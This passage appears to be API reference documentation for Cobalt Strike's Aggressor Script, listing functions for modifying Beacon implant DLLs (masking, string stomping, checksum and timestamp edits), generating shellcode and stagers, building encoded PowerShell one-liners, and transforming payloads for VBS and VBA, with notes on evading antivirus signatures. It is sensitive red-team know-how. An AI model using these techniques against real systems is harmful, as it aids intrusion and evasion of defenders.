# $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_mask_string
Mask a string in the Beacon DLL Content based on position.
Arguments
$1 - Beacon DLL content
$2 - Start location
$3 - Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {
local('$temp_dll, $location, $length, $maskkey');
local('%pemap');
local('@loc);
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.0."));
if (size(@loc) != 1) {
warn("Unexpected size of section name location array: " . size(@loc));
} else {
warn("Current section name location: " . @loc[0]);
}
# -------------------------------------
# Set parameters
# -------------------------------------
$location = @loc[0];
$length = 5;
$maskkey = 23;
# -------------------------------------
# pe_mask_string (mask a string in a dll)
# -------------------------------------
# warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
$temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# we are unmasking the length of the string and the null character
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
# $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_patch_code
Patch code in the Beacon DLL Content based on find/replace in '.text' section'.
Arguments
$1 - Beacon DLL content
$2 - byte array to find for resolve offset
$3 - byte array place at resolved offset (overwrite data)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_patch_code {
local('$temp_dll, $findme, $replacement');
$temp_dll = $1;
# ====== simple text values ======
$findme = "abcABC123";
$replacement = "123ABCabc";
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
# ====== byte array as a hex string ======
$findme = "\x01\x02\x03\xfc\xfe\xff";
$replacement = "\x01\x02\x03\xfc\xfe\xff";
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_remove_rich_header
Remove the rich header from Beacon DLL Content.
Arguments
$1 - Beacon DLL content
Returns
Updated DLL Content
Example
# ------------------------------------- # Remove/Replace Rich Header # ------------------------------------- $temp_dll = pe_remove_rich_header($temp_dll);
pe_set_compile_time_with_long
Set the compile time in the Beacon DLL Content.
Arguments
$1 - Beacon DLL content
$2 - Compile Time (as a long in milliseconds)
Returns
Updated DLL Content
Example
# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
pe_set_compile_time_with_string
Set the compile time in the Beacon DLL Content.
Arguments
$1 - Beacon DLL content
$2 - Compile Time (as a string)
Returns
Updated DLL Content
Example
# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);
pe_set_export_name
Set the export name in the Beacon DLL Content.
Arguments
$1 - Beacon DLL content
Returns
Updated DLL Content
Note
The name must exist in the string table.
Example
# ------------------------------------- # name must be in strings table... # ------------------------------------- $export_name = "WININET.dll"; $temp_dll = pe_set_export_name($temp_dll, $export_name); $export_name = "beacon.dll"; $temp_dll = pe_set_export_name($temp_dll, $export_name);
pe_set_long
Places a long value at a specified location.
Arguments
$1 - Beacon DLL content
$2 - Location
$3 - Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {
local('$temp_dll, $int_offset, $long_value');
local('%pemap');
local('@loc_cs, @val_cs');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_cs = values(%pemap, @("CheckSum.<location>"));
@val_cs = values(%pemap, @("CheckSum.<value>"));
if (size(@val_cs) != 1) {
warn("Unexpected size of checksum value array: " . size(@val_cs));
} else {
warn("Current checksum value: " . @val_cs[0]);
}
if (size(@loc_cs) != 1) {
warn("Unexpected size of checksum location array: " . size(@loc_cs));
} else {
warn("Current checksum location: " . @loc_cs[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$int_offset = parseNumber(@loc_cs[0], 10);
$long_value = 98765;
# -------------------------------------
# pe_set_long (set a long value)
# -------------------------------------
# warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
$temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_short
Places a short value at a specified location.
Arguments
$1 - Beacon DLL content
$2 - Location
$3 - Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {
local('$temp_dll, $int_offset, $short_value');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @(".text.NumberOfRelocations."));
@val = values(%pemap, @(".text.NumberOfRelocations."));
if (size(@val) != 1) {
warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
} else {
warn("Current .text.NumberOfRelocations value: " . @val[0]);
}
if (size(@loc) != 1) {
warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
} else {
warn("Current .text.NumberOfRelocations location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$int_offset = parseNumber(@loc[0], 10);
$short_value = 128;
# -------------------------------------
# pe_set_short (set a short value)
# -------------------------------------
# warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
$temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_string
Places a string value at a specified location.
Arguments
$1 - Beacon DLL content
$2 - Start location
$3 - Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {
local('$temp_dll, $location, $value');
local('%pemap');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_en = values(%pemap, @("Export.Name."));
@val_en = values(%pemap, @("Export.Name."));
if (size(@val_en) != 1) {
warn("Unexpected size of export name value array: " . size(@val_en));
} else {
warn("Current export value: " . @val_en[0]);
}
if (size(@loc_en) != 1) {
warn("Unexpected size of export location array: " . size(@loc_en));
} else {
warn("Current export name location: " . @loc_en[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$location = parseNumber(@loc_en[0], 10);
$value = "BEECON.DLL";
# -------------------------------------
# pe_set_string (set a string value)
# -------------------------------------
# warn("pe_set_string(dll, " . $location . ", " . $value . ")");
$temp_dll = pe_set_string($temp_dll, $location, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_stringz
Places a string value at a specified location and adds a zero terminator.
Arguments
$1 - Beacon DLL content
$2 - Start location
$3 - String to set
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {
local('$temp_dll, $offset, $value');
local('%pemap');
local('@loc');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.0."));
if (size(@loc) != 1) {
warn("Unexpected size of section name location array: " . size(@loc));
} else {
warn("Current section name location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$offset = parseNumber(@loc[0], 10);
$value = "abc";
# -------------------------------------
# pe_set_stringz
# -------------------------------------
# warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
$temp_dll = pe_set_stringz($temp_dll, $offset, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# Set parameters
# -------------------------------------
# $offset = parseNumber(@loc[0], 10);
# $value = ".tex";
# -------------------------------------
# pe_set_string (set a string value)
# -------------------------------------
# warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
# $temp_dll = pe_set_string($temp_dll, $offset, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_value_at
Sets a long value based on the location resolved by a name from the PE Map (see pedump).
Arguments
$1 - Beacon DLL content
$2 - Name of location field
$3 - Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {
local('$temp_dll, $name, $long_value, $date');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
# %pemap = pedump($temp_dll);
# @loc = values(%pemap, @("SizeOfImage."));
# @val = values(%pemap, @("SizeOfImage."));
# if (size(@val) != 1) {
# warn("Unexpected size of SizeOfImage. value array: " . size(@val));
# } else {
# warn("Current SizeOfImage. value: " . @val[0]);
# }
# if (size(@loc) != 1) {
# warn("Unexpected size of SizeOfImage location array: " . size(@loc));
# } else {
# warn("Current SizeOfImage. location: " . @loc[0]);
# }
# -------------------------------------
# Set parameters
# -------------------------------------
$name = "SizeOfImage";
$long_value = 22334455;
# -------------------------------------
# pe_set_value_at (set a long value at the location resolved by name)
# -------------------------------------
# $1 = DLL (byte array)
# $2 = name (string)
# $3 = value (long)
# -------------------------------------
warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
$temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# set it back?
# -------------------------------------
# warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
# $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_stomp
Set a string to null characters. Start at a specified location and sets all characters to null until a null string terminator is reached.
Arguments
$1 - Beacon DLL content
$2 - Start location
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {
local('$temp_dll, $offset, $value, $old_name');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.1."));
@val = values(%pemap, @("Sections.AddressOfName.1."));
if (size(@val) != 1) {
warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
} else {
warn("Current Sections.AddressOfName.1 value: " . @val[0]);
}
if (size(@loc) != 1) {
warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
} else {
warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$location = parseNumber(@loc[0], 10);
# -------------------------------------
# pe_stomp (stomp a string at a location)
# -------------------------------------
# warn("pe_stomp(dll, " . $location . ")");
$temp_dll = pe_stomp($temp_dll, $location);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_update_checksum
Update the checksum in the Beacon DLL Content.
Arguments
$1 - Beacon DLL content
Returns
Updated DLL Content
Note
This should be the last transformation performed.
Example
# ------------------------------------- # update checksum # ------------------------------------- $temp_dll = pe_update_checksum($temp_dll);
pedump
Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.
Arguments
$1 - Beacon DLL content
Returns
A map of the parsed information. The map data is very similar to the "./peclone dump [file]" command output.
Example
# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
$a = lc($1);
$b = lc($2);
return $a cmp $b;
}
# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
local('$out $key $val %pemap @sorted_keys');
%pemap = pedump($1);
# ---------------------------------------------------
# Example listing all items from hash/map...
# ---------------------------------------------------
@sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
foreach $key (@sorted_keys)
{
$out = "$[50]key";
foreach $val (values(%pemap, @($key)))
{
$out .= " $val";
println($out);
}
}
# ---------------------------------------------------
# Example of grabbing specific items from hash/map...
# ---------------------------------------------------
local('@loc_cs @val_cs');
@loc_cs = values(%pemap, @("CheckSum.<location>"));
@val_cs = values(%pemap, @("CheckSum.<value>"));
println("");
println("My DLL CheckSum Location: " . @loc_cs);
println("My DLL CheckSum Value: " . @val_cs);
println("");
}
See also
./peclone dump [file]
pgraph
Generate the pivot graph GUI component.
Returns
The pivot graph GUI object (a javax.swing.JComponent)
Example
addVisualization("Pivot Graph", pgraph());
See also
pivots
Returns a list of SOCKS pivots from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each pivot.
Example
printAll(pivots());
popup_clear
Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike's default popup menu definitions.
Arguments
$1 - the popup hook to clear registered menus for
Example
popup_clear("help");
popup help {
item "My stuff!" {
show_message("This is my menu!");
}
}
powershell
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.
Returns a PowerShell one-liner to bootstrap the specified listener.
Arguments
$1 - the listener name
$2 - [true/false]: is this listener targeting local host?
$3 - x86|x64 - the architecture of the generated stager.
Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A PowerShell one-liner to run the specified listener.
Example
println(powershell("my listener", false));
powershell_command
Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)
Arguments
$1 - the PowerShell expression to wrap into a one-liner.
$2 - will the PowerShell command run on a remote target?
Returns
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_command("2 + 2", false);
println($cmd);
powershell_compress
Compresses a PowerShell script and wraps it in a script to decompress and execute it.
Arguments
$1 - the PowerShell script to compress.
Example
$script = powershell_compress("2 + 2");
powershell_encode_oneliner
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead.
Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)
Arguments
$1 - the PowerShell expression to wrap into a one-liner.
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);
powershell_encode_stager
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead.
Returns a base64 encoded PowerShell script to run the specified shellcode
Arguments
$1 - shellcode to wrap
Returns
Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.
Example
$shellcode = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");
pref_get
Grabs a string value from Cobalt Strike's preferences.
Arguments
$1 - the preference name
$2 - the default value [if there is no value for this preference]
Returns
A string with the preference value.
Example
$foo = pref_get("foo.string", "bar");
pref_get_list
Grabs a list value from Cobalt Strike's preferences.
Arguments
$1 - the preference name
Returns
An array with the preference values
Example
@foo = pref_get_list("foo.list");
pref_set
Set a value in Cobalt Strike's preferences
Arguments
$1 - the preference name
$2 - the preference value
Example
pref_set("foo.string", "baz!");
pref_set_list
Stores a list value into Cobalt Strike's preferences.
Arguments
$1 - the preference name
$2 - an array of values for this preference
Example
pref_set_list("foo.list", @("a", "b", "c"));
previousTab
Activate the tab that is to the left of the current tab.
Example
bind Ctrl+Left {
previousTab();
}
process_browser
Opens the Process Browser. This function does not have any parameters.
privmsg
Post a private message to a user in the event log
Arguments
$1 - who to send the message to
$2 - the message
Example
privmsg("raffi", "what's up man?");
prompt_confirm
Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.
Arguments
$1 - text in the dialog
$2 - title of the dialog
$3 - a callback function. Called when the user presses yes.
Example
prompt_confirm("Do you feel lucky?", "Do you?", {
show_mesage("Ok, I got nothing");
});
prompt_directory_open
Show a directory open dialog.
Arguments
$1 - title of the dialog
$2 - default value
$3 - true/false: allow user to select multiple folders?
$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_directory_open("Choose a folder", $null, false, {
show_message("You chose: $1");
});
prompt_file_open
Show a file open dialog.
Arguments
$1 - title of the dialog
$2 - default value
$3 - true/false: allow user to select multiple files?
$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_file_open("Choose a file", $null, false, {
show_message("You chose: $1");
});
prompt_file_save
Show a file save dialog.
Arguments
$1 - default value
$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.
Example
prompt_file_save($null, {
local('$handle');
$handle = openf("> $+ $1");
println($handle, "I am content");
closef($handle);
});
prompt_text
Show a dialog that asks the user for text.
Arguments
$1 - text in the dialog
$2 - default value in the text field.
$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.
Example
prompt_text("What is your name?", "Cyber Bob", {
show_mesage("Hi $1 $+ , nice to meet you!");
});
range
Generate an array of numbers based on a string description of ranges.
Arguments
$1 - a string with a description of ranges
| Range | Result |
|---|---|
| 103 | The number 103 |
| 3-8 | The numbers 3, 4, 5, 6, and 7. |
| 2,4-6 | The numbers 2, 4, and 5. |
Returns
An array of numbers within the specified ranges.
Example
printAll(range("2,4-6"));
redactobject
Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.
Arguments
$1 - the ID of the post-exploitation object.
removeTab
Close the active tab
Example
bind Ctrl+D {
removeTab();
}
resetData
Reset Cobalt Strike's data model.
say
Post a public chat message to the event log.
Arguments
$1 - the message
Example
say("Hello World!");
sbrowser
Generate the session browser GUI component. Shows Beacon AND SSH sessions.
Returns
The session browser GUI object (a javax.swing.JComponent)
Example
addVisualization("Session Browser", sbrowser());
See also
screenshots
Returns a list of screenshots from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each screenshot.
Example
printAll(screenshots());
script_resource
Returns the full path to a resource that is stored relative to this script file.
Arguments
$1 - the file to get a path for
Returns
The full path to the specified file.
Example
println(script_resource("dummy.txt"));
separator
Insert a separator into the current menu tree.
Example
popup foo {
item "Stuff" { ... }
separator();
item "Other Stuff" { ... }
}
services
Returns a list of services in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each service.
Example
printAll(services());
setup_reflective_loader
Insert the reflective loader executable code into a beacon payload.
Arguments
$1 - Original beacon executable payload.
$2 - User defined Reflective Loader executable data.
Returns
The beacon executable payload updated with the user defined reflective loader. $null if there is an error.
Notes
The user defined Reflective Loader must be less than 5k.
Example
See BEACON_RDLL_GENERATE hook
# --------------------------------------------------------------------- # Replace the beacons default loader with '$loader'. # --------------------------------------------------------------------- $temp_dll = setup_reflective_loader($2, $loader);
setup_strings
Apply the strings defined in the Malleable C2 profile to the beacon payload.
Arguments
$1 – beacon payload to modify
Returns
The updated beacon payload with the defined strings applied to the payload.
Example
See BEACON_RDLL_GENERATE hook
# Apply strings to the beacon payload. $temp_dll = setup_strings($temp_dll);
setup_transformations
Apply the transformations rules defined in the Malleable C2 profile to the beacon payload.
Arguments
$1 – Beacon payload to modify
$2 – Beacon architecture (x86/x64)
Returns
The updated beacon payload with the transformations applied to the payload.
Example
See BEACON_RDLL_GENERATE hook
# Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch);
shellcode
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.
Returns raw shellcode for a specific Cobalt Strike listener
Arguments
$1 - the listener name
$2 - true/false: is this shellcode destined for a remote target?
$3 - x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = shellcode("my listener", false, "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
showVisualization
Switch Cobalt Strike visualization to a registered visualization.
Arguments
$1 - the name of the visualization
Example
bind Ctrl+H {
showVisualization("Hello World");
}
See also
show_error
Shows an error message to the user in a dialog box. Use this function to relay error information.
Arguments
$1 - the message text
Example
show_error("You did something bad.");
show_message
Shows a message to the user in a dialog box. Use this function to relay information.
Arguments
$1 - the message text
Example
show_message("You've won a free ringtone");
site_host
Host content on Cobalt Strike's web server
Arguments
$1 - the host for this site (&localip is a good default)
$2 - the port (e.g., 80)
$3 - the URI (e.g., /foo)
$4 - the content to host (as a string)
$5 - the mime-type (e.g., "text/plain")
$6 - a description of the content. Shown in Site Management -> Manage.
$7 - use SSL or not (true or false)
Returns
The URL to this hosted site
Example
site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);
site_kill
Remove a site from Cobalt Strike's web server
Arguments
$1 - the port
$2 - the URI
Example
# removes the content bound to / on port 80 site_kill(80, "/");
sites
Returns a list of sites tied to Cobalt Strike's web server.
Returns
An array of dictionary objects with information about each registered site.
Example
printAll(sites());
ssh_command_describe
Describe an SSH command.
Returns
A string description of the SSH command.
Arguments
$1 - the command
Example
println(ssh_command_describe("sudo"));
ssh_command_detail
Get the help information for an SSH command.
Returns
A string with helpful information about an SSH command.
Arguments
$1 - the command
Example
println(ssh_command_detail("sudo"));
ssh_command_register
Register help information for an SSH console command.
Arguments
$1 - the command
$2 - the short description of the command
$3 - the long-form help for the command.
Example
ssh_alias echo {
blog($1, "You typed: " . substr($1, 5));
}
ssh_command_register(
"echo",
"echo posts to the current session's log",
"Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
ssh_commands
Get a list of SSH commands.
Returns
An array of SSH commands.
Example
printAll(ssh_commands());
stager
Returns the stager for a specific Cobalt Strike listener
Arguments
$1 - the listener name
$2 - x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = stager("my listener", "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
stager_bind_pipe
Returns a bind_pipe stager for a specific Cobalt Strike listener. This stager is suitable for use in lateral movement actions that benefit from a small named pipe stager. Stage with &beacon_stage_pipe.
Arguments
$1 - the listener name
Returns
A scalar containing x86 bind_pipe shellcode.
Example
# step 1. generate our stager
$stager = stager_bind_pipe("my listener");
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also
stager_bind_tcp
Returns a bind_tcp stager for a specific Cobalt Strike listener. This stager is suitable for use in localhost-only actions that require a small stager. Stage with &beacon_stage_tcp.
Arguments
$1 - the listener name
$2 - x86|x64 - the architecture of the stager output.
$3 - the port to bind to
Returns
A scalar containing bind_tcp shellcode
Example
# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also
str_chunk
Chunk a string into multiple parts
Arguments
$1 - the string to chunk
$2 - the maximum size of each chunk
Returns
The original string split into multiple chunks
Example
# hint... :)
else if ($1 eq "template.x86.ps1") {
local('$enc');
$enc = str_chunk(base64_encode($2), 61);
return strrep($data, '%%DATA%%', join("' + '", $enc));
}
str_decode
Convert a string of bytes to text with the specified encoding.
Arguments
$1 - the string to decode
$2 - the encoding to use.
Returns
The decoded text.
Example
# convert back to a string we can use (from UTF16-LE) $text = str_decode($string, "UTF16-LE");
str_encode
Convert text to byte string with the specified character encoding.
Arguments
$1 - the string to encode
$2 - the encoding to use
Returns
The resulting string.
Example
# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");
str_xor
Walk a string and XOR it with the provided key.
Arguments
$1 - the string to mask
$2 - the key to use (string)
Returns
The original string masked with the specified key.
Example
$mask = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");
sync_download
Sync a downloaded file (View -> Downloads) to a local path.
Arguments
$1 - the remote path to the file to sync. See &downloads
$2 - where to save the file locally
$3 - (optional) a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.
Example
# sync all downloads
command ga {
local('$download $lpath $name $count');
foreach $count => $download (downloads()) {
($lpath, $name) = values($download, @("lpath", "name"));
sync_download($lpath, script_resource("file $+ .$count"), lambda({
println("Downloaded $1 [ $+ $name $+ ]");
}, \$name));
}
}
targets
Returns a list of host information in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each host.
Example
printAll(targets());
tbrowser
Generate the target browser GUI component.
Returns
The target browser GUI object (a javax.swing.JComponent)
Example
addVisualization("Target Browser", tbrowser());
See also
tokenToEmail
Covert a phishing token to an email address.
Arguments
$1 - the phishing token
Returns
The email address or "unknown" if the token is not associated with an email.
Example
set PROFILER_HIT {
local('$out $app $ver $email');
$email = tokenToEmail($5);
$out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
foreach $app => $ver ($4) {
$out .= "\n\t $+ $[25]app $ver";
}
return "$out $+ \n\n";
}
transform
Transform shellcode into another format.
Arguments
$1 - the shellcode to transform
$2 - the transform to apply
| Type | Description |
|---|---|
| array | comma separated byte values |
| hex | Hex-encode the value |
| powershell-base64 | PowerShell.exe-friendly base64 encoder |
| vba | a VBA array() with newlines added in |
| vbs | a VBS expression that results in a string |
| veil | Veil-ready string (\x##\x##) |
Returns
The shellcode after the specified transform is applied
Example
println(transform("This is a test!", "veil"));
transform_vbs
Transform shellcode into a VBS expression that results in a string
Arguments
$1 - the shellcode to transform
$2 - the maximum length of a plaintext run
Notes
- Previously, Cobalt Strike would embed its stagers into VBS files as several
Chr()calls concatenated into a string. - Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
- To get past this VBS limitation, Cobalt Strike opted to use
Chr()calls for non-ASCII data and runs of double-quoted strings for printable characters. - This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
- If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.
Returns
The shellcode after this transform is applied
Example
println(transform_vbs("This is a test!", "3"));
tstamp
Format a time into a date/time value. This value does not include seconds.
Arguments
$1 - the time [milliseconds since the UNIX epoch]
Example
println("The time is now: " . tstamp(ticks()));
See also
unbind
Remove a keyboard shortcut binding.
Arguments
$1 - the keyboard shortcut
Example
# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also
url_open
Open a URL in the default browser.
Arguments
$1 - the URL to open
Example
command go {
url_open("https://www.cobaltstrike.com/");
}
users
Returns a list of users connected to this team server.
Returns
An array of users.
Example
foreach $user (users()) {
println($user);
}
vpn_interface_info
Get information about a VPN interface.
Arguments
$1 - the interface name
$2 - [Optional] the key to extract a value for
Returns
%info = vpn_interface_info("interface");
Returns a dictionary with the metadata for this interface.
$value = vpn_interface_info("interface", "key");
Returns the value for the specified key from this interface's metadata
Example
# create a script console alias to interface info
command interface {
println("Interface $1");
foreach $key => $value (vpn_interface_info($1)) {
println("$[15]key $value");
}
}
vpn_interfaces
Return a list of VPN interface names
Returns
An array of interface names.
Example
printAll(vpn_interfaces());
vpn_tap_create
Create a Covert VPN interface on the team server system.
Arguments
$1 - the interface name (e.g., phear0)
$2 - the MAC address ($null will make a random MAC address)
$3 - reserved; use $null for now.
$4 - the port to bind the VPN's channel to
$5 - the type of channel [bind, http, icmp, reverse, udp]
Example
vpn_tap_create("phear0", $null, $null, 7324, "udp");
vpn_tap_delete
Destroy a Covert VPN interface
Arguments
$1 - the interface name (e.g., phear0)
Example
vpn_tap_destroy("phear0");